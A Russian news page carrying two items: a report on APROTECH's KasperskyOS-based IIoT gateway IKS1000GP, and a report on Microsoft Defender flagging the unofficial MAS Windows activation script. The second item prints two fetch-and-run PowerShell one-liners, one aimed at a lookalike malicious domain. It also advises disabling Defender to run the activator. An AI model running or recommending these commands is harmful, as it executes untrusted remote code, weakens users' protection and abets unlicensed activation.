АПРОТЕХ представила решение для обработки данных на базе KasperskyOS

АПРОТЕХ представила решение для обработки данных на базе KasperskyOS

АПРОТЕХ представила решение для обработки данных на базе KasperskyOS

НПО «Адаптивные Промышленные Технологии» (АПРОТЕХ) — дочернее предприятие «Лаборатории Касперского» и ИТЭЛМА — разработало программно-аппаратный комплекс IKS1000GP, который предназначен для сбора и обработки «сырых» промышленных данных (шлюз промышленного интернета вещей — IIoT GateWay). Это решение создано на базе KasperskyOS и оборудования компании «Сименс». Оно имеет большой экспортный потенциал, ведь сквозные цифровые сервисы, основанные на доверенных промышленных данных и построенные на открытой облачной платформе, — это принципиально новое явление как для России, так и для международных рынков.

Разработанный программно-аппаратный комплекс получает информацию от промышленного оборудования, включая станки, конвейеры, двигатели и турбины. Далее он в режиме реального времени агрегирует потоки данных и подготавливает их к использованию платформами промышленного интернета вещей (IIoT). Важное преимущество применения шлюза — возможность безопасно передавать промышленные данные на удалённую площадку предприятия. Таким образом, сводятся к минимуму действия человека в производственном контуре, а экспертная оценка данных (интерпретация сложных событий, выявление скрытых закономерностей и аномалий и так далее) может проводиться в онлайн-режиме небольшой группой специалистов или с помощью технологий машинного обучения.

При использовании шлюза предполагаются два основных способа хранения и обработки данных. В первом случае программно-аппаратный комплекс передаёт информацию в облако, которое находится в центре обработки данных компании «Сименс». Во втором — заказчик может создать собственное частное облако, в таком случае информация точно не будет передаваться за периметр предприятия.

Первая версия шлюза IKS1000GP создана на коммерчески доступной аппаратной платформе SIMATIC IoT2040 компании «Сименс», на которую была портирована KasperskyOS. На базе этой операционной системы разработчики дочернего предприятия «Лаборатории Касперского» и ИТЭЛМА сделали пять различных программных компонентов, отвечающих за взаимодействие с облачной платформой промышленного интернета, принимающих данные от оборудования и использующихся для конфигурирования и управления. Использование шлюза IKS1000GP позволяет строить сквозные информационные сервисы, связывающие уровень производственного оборудования с процессами управления операционной эффективностью производства — и тем самым раскрывать экономический потенциал промышленных данных.

НПО «Адаптивные промышленные технологии» и группа ЧТПЗ участвуют в совместном инновационном проекте по применению технологий промышленного интернета вещей в области цифровой трансформации и прослеживаемости работы предприятия. Основная задача проекта связана с прямым подключением к промышленному оборудованию с целью сбора, накопления и анализа получаемых данных и оценки на их базе ключевых производственных показателей в динамике. В рамках пилотного проекта разработан сквозной цифровой сервис на облачной платформе Siemens MindSphere, а безопасность подключаемого оборудования, а также доверенность передаваемых данных обеспечивают шлюзы IKS1000GP.

«Группа ЧТПЗ первой из промышленных компаний пилотировала данное решение, и в случае успешных доработок компания рассматривает возможность его применения на площадках «ЧТПЗ. Трубный сервис» — это новое бизнес-направление компании по предоставлению клиентам комплексных услуг по производству и обслуживанию насосно-компрессорных труб. Решение АПРОТЕХ IKS1000GP позволяет оперативно собирать и передавать данные о производстве и ремонте трубной продукции, что позволит снизить стоимость эксплуатации систем и повысить операционную эффективность производства. Использование подобных решений отвечает принципам программы клиентоцентричной трансформации Группы ЧТПЗ на базе цифровых технологий, запущенной в 2018 году», — комментирует директор по информационным технологиям Группы ЧТПЗ Рустам Абдрахманов.

Андрей Суворов, руководитель научно-производственного объединения «Адаптивные промышленные технологии» («Апротех»), ещё в 2018 году рассказал читателям Anti-Malware.ru об этом решении. Тогда оно было прототипом.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru